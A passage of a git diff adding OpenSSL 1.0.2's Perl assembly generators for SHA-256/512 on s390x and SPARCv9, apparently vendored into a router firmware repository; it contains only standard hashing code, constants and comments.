+	.quad	0x72be5d74f27b896f,0x80deb1fe3b1696b1
+	.quad	0x9bdc06a725c71235,0xc19bf174cf692694
+	.quad	0xe49b69c19ef14ad2,0xefbe4786384f25e3
+	.quad	0x0fc19dc68b8cd5b5,0x240ca1cc77ac9c65
+	.quad	0x2de92c6f592b0275,0x4a7484aa6ea6e483
+	.quad	0x5cb0a9dcbd41fbd4,0x76f988da831153b5
+	.quad	0x983e5152ee66dfab,0xa831c66d2db43210
+	.quad	0xb00327c898fb213f,0xbf597fc7beef0ee4
+	.quad	0xc6e00bf33da88fc2,0xd5a79147930aa725
+	.quad	0x06ca6351e003826f,0x142929670a0e6e70
+	.quad	0x27b70a8546d22ffc,0x2e1b21385c26c926
+	.quad	0x4d2c6dfc5ac42aed,0x53380d139d95b3df
+	.quad	0x650a73548baf63de,0x766a0abb3c77b2a8
+	.quad	0x81c2c92e47edaee6,0x92722c851482353b
+	.quad	0xa2bfe8a14cf10364,0xa81a664bbc423001
+	.quad	0xc24b8b70d0f89791,0xc76c51a30654be30
+	.quad	0xd192e819d6ef5218,0xd69906245565a910
+	.quad	0xf40e35855771202a,0x106aa07032bbd1b8
+	.quad	0x19a4c116b8d2d0c8,0x1e376c085141ab53
+	.quad	0x2748774cdf8eeb99,0x34b0bcb5e19b48a8
+	.quad	0x391c0cb3c5c95a63,0x4ed8aa4ae3418acb
+	.quad	0x5b9cca4f7763e373,0x682e6ff3d6b2b8a3
+	.quad	0x748f82ee5defb2fc,0x78a5636f43172f60
+	.quad	0x84c87814a1f0ab72,0x8cc702081a6439ec
+	.quad	0x90befffa23631e28,0xa4506cebde82bde9
+	.quad	0xbef9a3f7b2c67915,0xc67178f2e372532b
+	.quad	0xca273eceea26619c,0xd186b8c721c0c207
+	.quad	0xeada7dd6cde0eb1e,0xf57d4f7fee6ed178
+	.quad	0x06f067aa72176fba,0x0a637dc5a2c898a6
+	.quad	0x113f9804bef90dae,0x1b710b35131c471b
+	.quad	0x28db77f523047d84,0x32caab7b40c72493
+	.quad	0x3c9ebe0a15c9bebc,0x431d67c49c100d4c
+	.quad	0x4cc5d4becb3e42b6,0x597f299cfc657e2a
+	.quad	0x5fcb6fab3ad6faec,0x6c44198c4a475817
+___
+$code.=<<___;
+.size	$Table,.-$Table
+.globl	$Func
+.type	$Func,\@function
+$Func:
+	sllg	$len,$len,`log(16*$SZ)/log(2)`
+___
+$code.=<<___ if ($kimdfunc);
+	larl	%r1,OPENSSL_s390xcap_P
+	lg	%r0,0(%r1)
+	tmhl	%r0,0x4000	# check for message-security assist
+	jz	.Lsoftware
+	lghi	%r0,0
+	la	%r1,`2*$SIZE_T`($sp)
+	.long	0xb93e0002	# kimd %r0,%r2
+	lg	%r0,`2*$SIZE_T`($sp)
+	tmhh	%r0,`0x8000>>$kimdfunc`
+	jz	.Lsoftware
+	lghi	%r0,$kimdfunc
+	lgr	%r1,$ctx
+	lgr	%r2,$inp
+	lgr	%r3,$len
+	.long	0xb93e0002	# kimd %r0,%r2
+	brc	1,.-4		# pay attention to "partial completion"
+	br	%r14
+.align	16
+.Lsoftware:
+___
+$code.=<<___;
+	lghi	%r1,-$frame
+	la	$len,0($len,$inp)
+	stm${g}	$ctx,%r15,`2*$SIZE_T`($sp)
+	lgr	%r0,$sp
+	la	$sp,0(%r1,$sp)
+	st${g}	%r0,0($sp)
+
+	larl	$tbl,$Table
+	$LD	$A,`0*$SZ`($ctx)
+	$LD	$B,`1*$SZ`($ctx)
+	$LD	$C,`2*$SZ`($ctx)
+	$LD	$D,`3*$SZ`($ctx)
+	$LD	$E,`4*$SZ`($ctx)
+	$LD	$F,`5*$SZ`($ctx)
+	$LD	$G,`6*$SZ`($ctx)
+	$LD	$H,`7*$SZ`($ctx)
+
+.Lloop:
+	lghi	$len,0
+___
+for ($i=0;$i<16;$i++)	{ &BODY_00_15($i,@V); unshift(@V,pop(@V)); }
+$code.=".Lrounds_16_xx:\n";
+for (;$i<32;$i++)	{ &BODY_16_XX($i,@V); unshift(@V,pop(@V)); }
+$code.=<<___;
+	aghi	$len,`16*$SZ`
+	lghi	$t0,`($rounds-16)*$SZ`
+	clgr	$len,$t0
+	jne	.Lrounds_16_xx
+
+	l${g}	$ctx,`$frame+2*$SIZE_T`($sp)
+	la	$inp,`16*$SZ`($inp)
+	$ADD	$A,`0*$SZ`($ctx)
+	$ADD	$B,`1*$SZ`($ctx)
+	$ADD	$C,`2*$SZ`($ctx)
+	$ADD	$D,`3*$SZ`($ctx)
+	$ADD	$E,`4*$SZ`($ctx)
+	$ADD	$F,`5*$SZ`($ctx)
+	$ADD	$G,`6*$SZ`($ctx)
+	$ADD	$H,`7*$SZ`($ctx)
+	$ST	$A,`0*$SZ`($ctx)
+	$ST	$B,`1*$SZ`($ctx)
+	$ST	$C,`2*$SZ`($ctx)
+	$ST	$D,`3*$SZ`($ctx)
+	$ST	$E,`4*$SZ`($ctx)
+	$ST	$F,`5*$SZ`($ctx)
+	$ST	$G,`6*$SZ`($ctx)
+	$ST	$H,`7*$SZ`($ctx)
+	cl${g}	$inp,`$frame+4*$SIZE_T`($sp)
+	jne	.Lloop
+
+	lm${g}	%r6,%r15,`$frame+6*$SIZE_T`($sp)	
+	br	%r14
+.size	$Func,.-$Func
+.string	"SHA${label} block transform for s390x, CRYPTOGAMS by <appro\@openssl.org>"
+.comm	OPENSSL_s390xcap_P,16,8
+___
+
+$code =~ s/\`([^\`]*)\`/eval $1/gem;
+# unlike 32-bit shift 64-bit one takes three arguments
+$code =~ s/(srlg\s+)(%r[0-9]+),/$1$2,$2,/gm;
+
+print $code;
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha512-sparcv9.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha512-sparcv9.pl
new file mode 100644
index 0000000..5a9c15d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha512-sparcv9.pl
@@ -0,0 +1,850 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+#
+# Hardware SPARC T4 support by David S. Miller <davem@davemloft.net>.
+# ====================================================================
+
+# SHA256 performance improvement over compiler generated code varies
+# from 40% for Sun C [32-bit build] to 70% for gcc [3.3, 64-bit
+# build]. Just like in SHA1 module I aim to ensure scalability on
+# UltraSPARC T1 by packing X[16] to 8 64-bit registers.
+
+# SHA512 on pre-T1 UltraSPARC.
+#
+# Performance is >75% better than 64-bit code generated by Sun C and
+# over 2x than 32-bit code. X[16] resides on stack, but access to it
+# is scheduled for L2 latency and staged through 32 least significant
+# bits of %l0-%l7. The latter is done to achieve 32-/64-bit ABI
+# duality. Nevetheless it's ~40% faster than SHA256, which is pretty
+# good [optimal coefficient is 50%].
+#
+# SHA512 on UltraSPARC T1.
+#
+# It's not any faster than 64-bit code generated by Sun C 5.8. This is
+# because 64-bit code generator has the advantage of using 64-bit
+# loads(*) to access X[16], which I consciously traded for 32-/64-bit
+# ABI duality [as per above]. But it surpasses 32-bit Sun C generated
+# code by 60%, not to mention that it doesn't suffer from severe decay
+# when running 4 times physical cores threads and that it leaves gcc
+# [3.4] behind by over 4x factor! If compared to SHA256, single thread
+# performance is only 10% better, but overall throughput for maximum
+# amount of threads for given CPU exceeds corresponding one of SHA256
+# by 30% [again, optimal coefficient is 50%].
+#
+# (*)	Unlike pre-T1 UltraSPARC loads on T1 are executed strictly
+#	in-order, i.e. load instruction has to complete prior next
+#	instruction in given thread is executed, even if the latter is
+#	not dependent on load result! This means that on T1 two 32-bit
+#	loads are always slower than one 64-bit load. Once again this
+#	is unlike pre-T1 UltraSPARC, where, if scheduled appropriately,
+#	2x32-bit loads can be as fast as 1x64-bit ones.
+#
+# SPARC T4 SHA256/512 hardware achieves 3.17/2.01 cycles per byte,
+# which is 9.3x/11.1x faster than software. Multi-process benchmark
+# saturates at 11.5x single-process result on 8-core processor, or
+# ~11/16GBps per 2.85GHz socket.
+
+$output=shift;
+open STDOUT,">$output";
+
+if ($output =~ /512/) {
+	$label="512";
+	$SZ=8;
+	$LD="ldx";		# load from memory
+	$ST="stx";		# store to memory
+	$SLL="sllx";		# shift left logical
+	$SRL="srlx";		# shift right logical
+	@Sigma0=(28,34,39);
+	@Sigma1=(14,18,41);
+	@sigma0=( 7, 1, 8);	# right shift first
+	@sigma1=( 6,19,61);	# right shift first
+	$lastK=0x817;
+	$rounds=80;
+	$align=4;
+
+	$locals=16*$SZ;		# X[16]
+
+	$A="%o0";
+	$B="%o1";
+	$C="%o2";
+	$D="%o3";
+	$E="%o4";
+	$F="%o5";
+	$G="%g1";
+	$H="%o7";
+	@V=($A,$B,$C,$D,$E,$F,$G,$H);
+} else {
+	$label="256";
+	$SZ=4;
+	$LD="ld";		# load from memory
+	$ST="st";		# store to memory
+	$SLL="sll";		# shift left logical
+	$SRL="srl";		# shift right logical
+	@Sigma0=( 2,13,22);
+	@Sigma1=( 6,11,25);
+	@sigma0=( 3, 7,18);	# right shift first
+	@sigma1=(10,17,19);	# right shift first
+	$lastK=0x8f2;
+	$rounds=64;
+	$align=8;
+
+	$locals=0;		# X[16] is register resident
+	@X=("%o0","%o1","%o2","%o3","%o4","%o5","%g1","%o7");
+	
+	$A="%l0";
+	$B="%l1";
+	$C="%l2";
+	$D="%l3";
+	$E="%l4";
+	$F="%l5";
+	$G="%l6";
+	$H="%l7";
+	@V=($A,$B,$C,$D,$E,$F,$G,$H);
+}
+$T1="%g2";
+$tmp0="%g3";
+$tmp1="%g4";
+$tmp2="%g5";
+
+$ctx="%i0";
+$inp="%i1";
+$len="%i2";
+$Ktbl="%i3";
+$tmp31="%i4";
+$tmp32="%i5";
+
+########### SHA256
+$Xload = sub {
+my ($i,$a,$b,$c,$d,$e,$f,$g,$h)=@_;
+
+    if ($i==0) {
+$code.=<<___;
+	ldx	[$inp+0],@X[0]
+	ldx	[$inp+16],@X[2]
+	ldx	[$inp+32],@X[4]
+	ldx	[$inp+48],@X[6]
+	ldx	[$inp+8],@X[1]
+	ldx	[$inp+24],@X[3]
+	subcc	%g0,$tmp31,$tmp32 ! should be 64-$tmp31, but -$tmp31 works too
+	ldx	[$inp+40],@X[5]
+	bz,pt	%icc,.Laligned
+	ldx	[$inp+56],@X[7]
+
+	sllx	@X[0],$tmp31,@X[0]
+	ldx	[$inp+64],$T1
+___
+for($j=0;$j<7;$j++)
+{   $code.=<<___;
+	srlx	@X[$j+1],$tmp32,$tmp1
+	sllx	@X[$j+1],$tmp31,@X[$j+1]
+	or	$tmp1,@X[$j],@X[$j]
+___
+}
+$code.=<<___;
+	srlx	$T1,$tmp32,$T1
+	or	$T1,@X[7],@X[7]
+.Laligned:
+___
+    }
+
+    if ($i&1) {
+	$code.="\tadd	@X[$i/2],$h,$T1\n";
+    } else {
+	$code.="\tsrlx	@X[$i/2],32,$T1\n\tadd	$h,$T1,$T1\n";
+    }
+} if ($SZ==4);
+
+########### SHA512
+$Xload = sub {
+my ($i,$a,$b,$c,$d,$e,$f,$g,$h)=@_;
+my @pair=("%l".eval(($i*2)%8),"%l".eval(($i*2)%8+1),"%l".eval((($i+1)*2)%8));
+
+$code.=<<___ if ($i==0);
+	ld	[$inp+0],%l0
+	ld	[$inp+4],%l1
+	ld	[$inp+8],%l2
+	ld	[$inp+12],%l3
+	ld	[$inp+16],%l4
+	ld	[$inp+20],%l5
+	ld	[$inp+24],%l6
+	cmp	$tmp31,0
+	ld	[$inp+28],%l7
+___
+$code.=<<___ if ($i<15);
+	sllx	@pair[1],$tmp31,$tmp2	! Xload($i)
+	add	$tmp31,32,$tmp0
+	sllx	@pair[0],$tmp0,$tmp1
+	`"ld	[$inp+".eval(32+0+$i*8)."],@pair[0]"	if ($i<12)`
+	srlx	@pair[2],$tmp32,@pair[1]
+	or	$tmp1,$tmp2,$tmp2
+	or	@pair[1],$tmp2,$tmp2
+	`"ld	[$inp+".eval(32+4+$i*8)."],@pair[1]"	if ($i<12)`
+	add	$h,$tmp2,$T1
+	$ST	$tmp2,[%sp+STACK_BIAS+STACK_FRAME+`$i*$SZ`]
+___
+$code.=<<___ if ($i==12);
+	bnz,a,pn	%icc,.+8
+	ld	[$inp+128],%l0
+___
+$code.=<<___ if ($i==15);
+	ld	[%sp+STACK_BIAS+STACK_FRAME+`(($i+1+1)%16)*$SZ+0`],%l2
+	sllx	@pair[1],$tmp31,$tmp2	! Xload($i)
+	add	$tmp31,32,$tmp0
+	ld	[%sp+STACK_BIAS+STACK_FRAME+`(($i+1+1)%16)*$SZ+4`],%l3
+	sllx	@pair[0],$tmp0,$tmp1
+	ld	[%sp+STACK_BIAS+STACK_FRAME+`(($i+1+9)%16)*$SZ+0`],%l4
+	srlx	@pair[2],$tmp32,@pair[1]
+	or	$tmp1,$tmp2,$tmp2
+	ld	[%sp+STACK_BIAS+STACK_FRAME+`(($i+1+9)%16)*$SZ+4`],%l5
+	or	@pair[1],$tmp2,$tmp2
+	ld	[%sp+STACK_BIAS+STACK_FRAME+`(($i+1+14)%16)*$SZ+0`],%l6
+	add	$h,$tmp2,$T1
+	$ST	$tmp2,[%sp+STACK_BIAS+STACK_FRAME+`$i*$SZ`]
+	ld	[%sp+STACK_BIAS+STACK_FRAME+`(($i+1+14)%16)*$SZ+4`],%l7
+	ld	[%sp+STACK_BIAS+STACK_FRAME+`(($i+1+0)%16)*$SZ+0`],%l0
+	ld	[%sp+STACK_BIAS+STACK_FRAME+`(($i+1+0)%16)*$SZ+4`],%l1
+___
+} if ($SZ==8);
+
+########### common
+sub BODY_00_15 {
+my ($i,$a,$b,$c,$d,$e,$f,$g,$h)=@_;
+
+    if ($i<16) {
+	&$Xload(@_);
+    } else {
+	$code.="\tadd	$h,$T1,$T1\n";
+    }
+
+$code.=<<___;
+	$SRL	$e,@Sigma1[0],$h	!! $i
+	xor	$f,$g,$tmp2
+	$SLL	$e,`$SZ*8-@Sigma1[2]`,$tmp1
+	and	$e,$tmp2,$tmp2
+	$SRL	$e,@Sigma1[1],$tmp0
+	xor	$tmp1,$h,$h
+	$SLL	$e,`$SZ*8-@Sigma1[1]`,$tmp1
+	xor	$tmp0,$h,$h
+	$SRL	$e,@Sigma1[2],$tmp0
+	xor	$tmp1,$h,$h
+	$SLL	$e,`$SZ*8-@Sigma1[0]`,$tmp1
+	xor	$tmp0,$h,$h
+	xor	$g,$tmp2,$tmp2		! Ch(e,f,g)
+	xor	$tmp1,$h,$tmp0		! Sigma1(e)
+
+	$SRL	$a,@Sigma0[0],$h
+	add	$tmp2,$T1,$T1
+	$LD	[$Ktbl+`$i*$SZ`],$tmp2	! K[$i]
+	$SLL	$a,`$SZ*8-@Sigma0[2]`,$tmp1
+	add	$tmp0,$T1,$T1
+	$SRL	$a,@Sigma0[1],$tmp0
+	xor	$tmp1,$h,$h
+	$SLL	$a,`$SZ*8-@Sigma0[1]`,$tmp1
+	xor	$tmp0,$h,$h
+	$SRL	$a,@Sigma0[2],$tmp0
+	xor	$tmp1,$h,$h	
+	$SLL	$a,`$SZ*8-@Sigma0[0]`,$tmp1
+	xor	$tmp0,$h,$h
+	xor	$tmp1,$h,$h		! Sigma0(a)
+
+	or	$a,$b,$tmp0
+	and	$a,$b,$tmp1
+	and	$c,$tmp0,$tmp0
+	or	$tmp0,$tmp1,$tmp1	! Maj(a,b,c)
+	add	$tmp2,$T1,$T1		! +=K[$i]
+	add	$tmp1,$h,$h
+
+	add	$T1,$d,$d
+	add	$T1,$h,$h
+___
+}
+
+########### SHA256
+$BODY_16_XX = sub {
+my $i=@_[0];
+my $xi;
+
+    if ($i&1) {
+	$xi=$tmp32;
+	$code.="\tsrlx	@X[(($i+1)/2)%8],32,$xi\n";
+    } else {
+	$xi=@X[(($i+1)/2)%8];
+    }
+$code.=<<___;
+	srl	$xi,@sigma0[0],$T1		!! Xupdate($i)
+	sll	$xi,`32-@sigma0[2]`,$tmp1
+	srl	$xi,@sigma0[1],$tmp0
+	xor	$tmp1,$T1,$T1
+	sll	$tmp1,`@sigma0[2]-@sigma0[1]`,$tmp1
+	xor	$tmp0,$T1,$T1
+	srl	$xi,@sigma0[2],$tmp0
+	xor	$tmp1,$T1,$T1
+___
+    if ($i&1) {
+	$xi=@X[(($i+14)/2)%8];
+    } else {
+	$xi=$tmp32;
+	$code.="\tsrlx	@X[(($i+14)/2)%8],32,$xi\n";
+    }
+$code.=<<___;
+	srl	$xi,@sigma1[0],$tmp2
+	xor	$tmp0,$T1,$T1			! T1=sigma0(X[i+1])
+	sll	$xi,`32-@sigma1[2]`,$tmp1
+	srl	$xi,@sigma1[1],$tmp0
+	xor	$tmp1,$tmp2,$tmp2
+	sll	$tmp1,`@sigma1[2]-@sigma1[1]`,$tmp1
+	xor	$tmp0,$tmp2,$tmp2
+	srl	$xi,@sigma1[2],$tmp0
+	xor	$tmp1,$tmp2,$tmp2
+___
+    if ($i&1) {
+	$xi=@X[($i/2)%8];
+$code.=<<___;
+	srlx	@X[(($i+9)/2)%8],32,$tmp1	! X[i+9]
+	xor	$tmp0,$tmp2,$tmp2		! sigma1(X[i+14])
+	srl	@X[($i/2)%8],0,$tmp0
+	add	$tmp2,$tmp1,$tmp1
+	add	$xi,$T1,$T1			! +=X[i]
+	xor	$tmp0,@X[($i/2)%8],@X[($i/2)%8]
+	add	$tmp1,$T1,$T1
+
+	srl	$T1,0,$T1
+	or	$T1,@X[($i/2)%8],@X[($i/2)%8]
+___
+    } else {
+	$xi=@X[(($i+9)/2)%8];
+$code.=<<___;
+	srlx	@X[($i/2)%8],32,$tmp1		! X[i]
+	xor	$tmp0,$tmp2,$tmp2		! sigma1(X[i+14])
+	add	$xi,$T1,$T1			! +=X[i+9]
+	add	$tmp2,$tmp1,$tmp1
+	srl	@X[($i/2)%8],0,@X[($i/2)%8]
+	add	$tmp1,$T1,$T1
+
+	sllx	$T1,32,$tmp0
+	or	$tmp0,@X[($i/2)%8],@X[($i/2)%8]
+___
+    }
+    &BODY_00_15(@_);
+} if ($SZ==4);
+
+########### SHA512
+$BODY_16_XX = sub {
+my $i=@_[0];
+my @pair=("%l".eval(($i*2)%8),"%l".eval(($i*2)%8+1));
+
+$code.=<<___;
+	sllx	%l2,32,$tmp0		!! Xupdate($i)
+	or	%l3,$tmp0,$tmp0
+
+	srlx	$tmp0,@sigma0[0],$T1
+	ld	[%sp+STACK_BIAS+STACK_FRAME+`(($i+1+1)%16)*$SZ+0`],%l2
+	sllx	$tmp0,`64-@sigma0[2]`,$tmp1
+	ld	[%sp+STACK_BIAS+STACK_FRAME+`(($i+1+1)%16)*$SZ+4`],%l3
+	srlx	$tmp0,@sigma0[1],$tmp0
+	xor	$tmp1,$T1,$T1
+	sllx	$tmp1,`@sigma0[2]-@sigma0[1]`,$tmp1
+	xor	$tmp0,$T1,$T1
+	srlx	$tmp0,`@sigma0[2]-@sigma0[1]`,$tmp0
+	xor	$tmp1,$T1,$T1
+	sllx	%l6,32,$tmp2
+	xor	$tmp0,$T1,$T1		! sigma0(X[$i+1])
+	or	%l7,$tmp2,$tmp2
+
+	srlx	$tmp2,@sigma1[0],$tmp1
+	ld	[%sp+STACK_BIAS+STACK_FRAME+`(($i+1+14)%16)*$SZ+0`],%l6
+	sllx	$tmp2,`64-@sigma1[2]`,$tmp0
+	ld	[%sp+STACK_BIAS+STACK_FRAME+`(($i+1+14)%16)*$SZ+4`],%l7
+	srlx	$tmp2,@sigma1[1],$tmp2
+	xor	$tmp0,$tmp1,$tmp1
+	sllx	$tmp0,`@sigma1[2]-@sigma1[1]`,$tmp0
+	xor	$tmp2,$tmp1,$tmp1
+	srlx	$tmp2,`@sigma1[2]-@sigma1[1]`,$tmp2
+	xor	$tmp0,$tmp1,$tmp1
+	sllx	%l4,32,$tmp0
+	xor	$tmp2,$tmp1,$tmp1	! sigma1(X[$i+14])
+	ld	[%sp+STACK_BIAS+STACK_FRAME+`(($i+1+9)%16)*$SZ+0`],%l4
+	or	%l5,$tmp0,$tmp0
+	ld	[%sp+STACK_BIAS+STACK_FRAME+`(($i+1+9)%16)*$SZ+4`],%l5
+
+	sllx	%l0,32,$tmp2
+	add	$tmp1,$T1,$T1
+	ld	[%sp+STACK_BIAS+STACK_FRAME+`(($i+1+0)%16)*$SZ+0`],%l0
+	or	%l1,$tmp2,$tmp2
+	add	$tmp0,$T1,$T1		! +=X[$i+9]
+	ld	[%sp+STACK_BIAS+STACK_FRAME+`(($i+1+0)%16)*$SZ+4`],%l1
+	add	$tmp2,$T1,$T1		! +=X[$i]
+	$ST	$T1,[%sp+STACK_BIAS+STACK_FRAME+`($i%16)*$SZ`]
+___
+    &BODY_00_15(@_);
+} if ($SZ==8);
+
+$code.=<<___;
+#include "sparc_arch.h"
+
+#ifdef __arch64__
+.register	%g2,#scratch
+.register	%g3,#scratch
+#endif
+
+.section	".text",#alloc,#execinstr
+
+.align	64
+K${label}:
+.type	K${label},#object
+___
+if ($SZ==4) {
+$code.=<<___;
+	.long	0x428a2f98, 0x71374491, 0xb5c0fbcf, 0xe9b5dba5
+	.long	0x3956c25b, 0x59f111f1, 0x923f82a4, 0xab1c5ed5
+	.long	0xd807aa98, 0x12835b01, 0x243185be, 0x550c7dc3
+	.long	0x72be5d74, 0x80deb1fe, 0x9bdc06a7, 0xc19bf174
+	.long	0xe49b69c1, 0xefbe4786, 0x0fc19dc6, 0x240ca1cc
+	.long	0x2de92c6f, 0x4a7484aa, 0x5cb0a9dc, 0x76f988da
+	.long	0x983e5152, 0xa831c66d, 0xb00327c8, 0xbf597fc7
+	.long	0xc6e00bf3, 0xd5a79147, 0x06ca6351, 0x14292967
+	.long	0x27b70a85, 0x2e1b2138, 0x4d2c6dfc, 0x53380d13
+	.long	0x650a7354, 0x766a0abb, 0x81c2c92e, 0x92722c85
+	.long	0xa2bfe8a1, 0xa81a664b, 0xc24b8b70, 0xc76c51a3
+	.long	0xd192e819, 0xd6990624, 0xf40e3585, 0x106aa070
+	.long	0x19a4c116, 0x1e376c08, 0x2748774c, 0x34b0bcb5
+	.long	0x391c0cb3, 0x4ed8aa4a, 0x5b9cca4f, 0x682e6ff3
+	.long	0x748f82ee, 0x78a5636f, 0x84c87814, 0x8cc70208
+	.long	0x90befffa, 0xa4506ceb, 0xbef9a3f7, 0xc67178f2
+___
+} else {
+$code.=<<___;
+	.long	0x428a2f98,0xd728ae22, 0x71374491,0x23ef65cd
+	.long	0xb5c0fbcf,0xec4d3b2f, 0xe9b5dba5,0x8189dbbc
+	.long	0x3956c25b,0xf348b538, 0x59f111f1,0xb605d019
+	.long	0x923f82a4,0xaf194f9b, 0xab1c5ed5,0xda6d8118
+	.long	0xd807aa98,0xa3030242, 0x12835b01,0x45706fbe
+	.long	0x243185be,0x4ee4b28c, 0x550c7dc3,0xd5ffb4e2
+	.long	0x72be5d74,0xf27b896f, 0x80deb1fe,0x3b1696b1
+	.long	0x9bdc06a7,0x25c71235, 0xc19bf174,0xcf692694
+	.long	0xe49b69c1,0x9ef14ad2, 0xefbe4786,0x384f25e3
+	.long	0x0fc19dc6,0x8b8cd5b5, 0x240ca1cc,0x77ac9c65
+	.long	0x2de92c6f,0x592b0275, 0x4a7484aa,0x6ea6e483
+	.long	0x5cb0a9dc,0xbd41fbd4, 0x76f988da,0x831153b5
+	.long	0x983e5152,0xee66dfab, 0xa831c66d,0x2db43210
+	.long	0xb00327c8,0x98fb213f, 0xbf597fc7,0xbeef0ee4
+	.long	0xc6e00bf3,0x3da88fc2, 0xd5a79147,0x930aa725
+	.long	0x06ca6351,0xe003826f, 0x14292967,0x0a0e6e70
+	.long	0x27b70a85,0x46d22ffc, 0x2e1b2138,0x5c26c926
+	.long	0x4d2c6dfc,0x5ac42aed, 0x53380d13,0x9d95b3df
+	.long	0x650a7354,0x8baf63de, 0x766a0abb,0x3c77b2a8
+	.long	0x81c2c92e,0x47edaee6, 0x92722c85,0x1482353b
+	.long	0xa2bfe8a1,0x4cf10364, 0xa81a664b,0xbc423001
+	.long	0xc24b8b70,0xd0f89791, 0xc76c51a3,0x0654be30
+	.long	0xd192e819,0xd6ef5218, 0xd6990624,0x5565a910
+	.long	0xf40e3585,0x5771202a, 0x106aa070,0x32bbd1b8
+	.long	0x19a4c116,0xb8d2d0c8, 0x1e376c08,0x5141ab53
+	.long	0x2748774c,0xdf8eeb99, 0x34b0bcb5,0xe19b48a8
+	.long	0x391c0cb3,0xc5c95a63, 0x4ed8aa4a,0xe3418acb
+	.long	0x5b9cca4f,0x7763e373, 0x682e6ff3,0xd6b2b8a3
+	.long	0x748f82ee,0x5defb2fc, 0x78a5636f,0x43172f60
+	.long	0x84c87814,0xa1f0ab72, 0x8cc70208,0x1a6439ec
+	.long	0x90befffa,0x23631e28, 0xa4506ceb,0xde82bde9
+	.long	0xbef9a3f7,0xb2c67915, 0xc67178f2,0xe372532b
+	.long	0xca273ece,0xea26619c, 0xd186b8c7,0x21c0c207
+	.long	0xeada7dd6,0xcde0eb1e, 0xf57d4f7f,0xee6ed178
+	.long	0x06f067aa,0x72176fba, 0x0a637dc5,0xa2c898a6
+	.long	0x113f9804,0xbef90dae, 0x1b710b35,0x131c471b
+	.long	0x28db77f5,0x23047d84, 0x32caab7b,0x40c72493
+	.long	0x3c9ebe0a,0x15c9bebc, 0x431d67c4,0x9c100d4c
+	.long	0x4cc5d4be,0xcb3e42b6, 0x597f299c,0xfc657e2a
+	.long	0x5fcb6fab,0x3ad6faec, 0x6c44198c,0x4a475817
+___
+}
+$code.=<<___;
+.size	K${label},.-K${label}
+
+#ifdef __PIC__
+SPARC_PIC_THUNK(%g1)
+#endif
+
+.globl	sha${label}_block_data_order
+.align	32
+sha${label}_block_data_order:
+	SPARC_LOAD_ADDRESS_LEAF(OPENSSL_sparcv9cap_P,%g1,%g5)
+	ld	[%g1+4],%g1		! OPENSSL_sparcv9cap_P[1]
+
+	andcc	%g1, CFR_SHA${label}, %g0
+	be	.Lsoftware
+	nop
+___
+$code.=<<___ if ($SZ==8); 		# SHA512
+	ldd	[%o0 + 0x00], %f0	! load context
+	ldd	[%o0 + 0x08], %f2
+	ldd	[%o0 + 0x10], %f4
+	ldd	[%o0 + 0x18], %f6
+	ldd	[%o0 + 0x20], %f8
+	ldd	[%o0 + 0x28], %f10
+	andcc	%o1, 0x7, %g0
+	ldd	[%o0 + 0x30], %f12
+	bne,pn	%icc, .Lhwunaligned
+	 ldd	[%o0 + 0x38], %f14
+
+.Lhwaligned_loop:
+	ldd	[%o1 + 0x00], %f16
+	ldd	[%o1 + 0x08], %f18
+	ldd	[%o1 + 0x10], %f20
+	ldd	[%o1 + 0x18], %f22
+	ldd	[%o1 + 0x20], %f24
+	ldd	[%o1 + 0x28], %f26
+	ldd	[%o1 + 0x30], %f28
+	ldd	[%o1 + 0x38], %f30
+	ldd	[%o1 + 0x40], %f32
+	ldd	[%o1 + 0x48], %f34
+	ldd	[%o1 + 0x50], %f36
+	ldd	[%o1 + 0x58], %f38
+	ldd	[%o1 + 0x60], %f40
+	ldd	[%o1 + 0x68], %f42
+	ldd	[%o1 + 0x70], %f44
+	subcc	%o2, 1, %o2		! done yet?
+	ldd	[%o1 + 0x78], %f46
+	add	%o1, 0x80, %o1
+	prefetch [%o1 + 63], 20
+	prefetch [%o1 + 64+63], 20
+
+	.word	0x81b02860		! SHA512
+
+	bne,pt	SIZE_T_CC, .Lhwaligned_loop
+	nop
+
+.Lhwfinish:
+	std	%f0, [%o0 + 0x00]	! store context
+	std	%f2, [%o0 + 0x08]
+	std	%f4, [%o0 + 0x10]
+	std	%f6, [%o0 + 0x18]
+	std	%f8, [%o0 + 0x20]
+	std	%f10, [%o0 + 0x28]
+	std	%f12, [%o0 + 0x30]
+	retl
+	 std	%f14, [%o0 + 0x38]
+
+.align	16
+.Lhwunaligned:
+	alignaddr %o1, %g0, %o1
+
+	ldd	[%o1 + 0x00], %f18
+.Lhwunaligned_loop:
+	ldd	[%o1 + 0x08], %f20
+	ldd	[%o1 + 0x10], %f22
+	ldd	[%o1 + 0x18], %f24
+	ldd	[%o1 + 0x20], %f26
+	ldd	[%o1 + 0x28], %f28
+	ldd	[%o1 + 0x30], %f30
+	ldd	[%o1 + 0x38], %f32
+	ldd	[%o1 + 0x40], %f34
+	ldd	[%o1 + 0x48], %f36
+	ldd	[%o1 + 0x50], %f38
+	ldd	[%o1 + 0x58], %f40
+	ldd	[%o1 + 0x60], %f42
+	ldd	[%o1 + 0x68], %f44
+	ldd	[%o1 + 0x70], %f46
+	ldd	[%o1 + 0x78], %f48
+	subcc	%o2, 1, %o2		! done yet?
+	ldd	[%o1 + 0x80], %f50
+	add	%o1, 0x80, %o1
+	prefetch [%o1 + 63], 20
+	prefetch [%o1 + 64+63], 20
+
+	faligndata %f18, %f20, %f16
+	faligndata %f20, %f22, %f18
+	faligndata %f22, %f24, %f20
+	faligndata %f24, %f26, %f22
+	faligndata %f26, %f28, %f24
+	faligndata %f28, %f30, %f26
+	faligndata %f30, %f32, %f28
+	faligndata %f32, %f34, %f30
+	faligndata %f34, %f36, %f32
+	faligndata %f36, %f38, %f34
+	faligndata %f38, %f40, %f36
+	faligndata %f40, %f42, %f38
+	faligndata %f42, %f44, %f40
+	faligndata %f44, %f46, %f42
+	faligndata %f46, %f48, %f44
+	faligndata %f48, %f50, %f46
+
+	.word	0x81b02860		! SHA512
+
+	bne,pt	SIZE_T_CC, .Lhwunaligned_loop
+	for	%f50, %f50, %f18	! %f18=%f50
+
